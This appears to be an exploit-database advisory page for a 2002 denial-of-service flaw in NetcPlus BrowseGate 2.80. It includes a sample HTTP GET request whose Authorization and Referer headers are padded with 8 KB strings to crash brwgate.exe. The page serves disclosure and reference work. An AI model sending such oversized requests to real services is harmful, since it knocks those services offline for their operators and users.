header-logo
Suggest Exploit
vendor:
BrowseGate
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BrowseGate
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: NO
Related CWE: N/A
CPE: a:netcplus:browsegate:2.80
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

NetcPlus BrowseGate 2.80 Invalid Read Error

NetcPlus BrowseGate 2.80 will crash as the result of an invalid read error if a number of character strings consisting of 8 KB are inserted into GET request arguments through port 80.

Mitigation:

Restart the service to gain normal functionality.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1702/info

NetcPlus BrowseGate 2.80 will crash as the result of an invalid read error if a number of character strings consisting of 8 KB are inserted into GET request arguments through port 80.

For example:

GET / HTTP/1.0<cr>
Authorization: Basic(8 KB string of characters)<cr>
From: email@address.com<cr>
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
Referer: http://referrer/(8 KB string of characters)<cr>
UserAgent: Browser 1.1<cr>
<cr><cr>

will cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality.

Navigation

Suggest Exploit

Services By CQR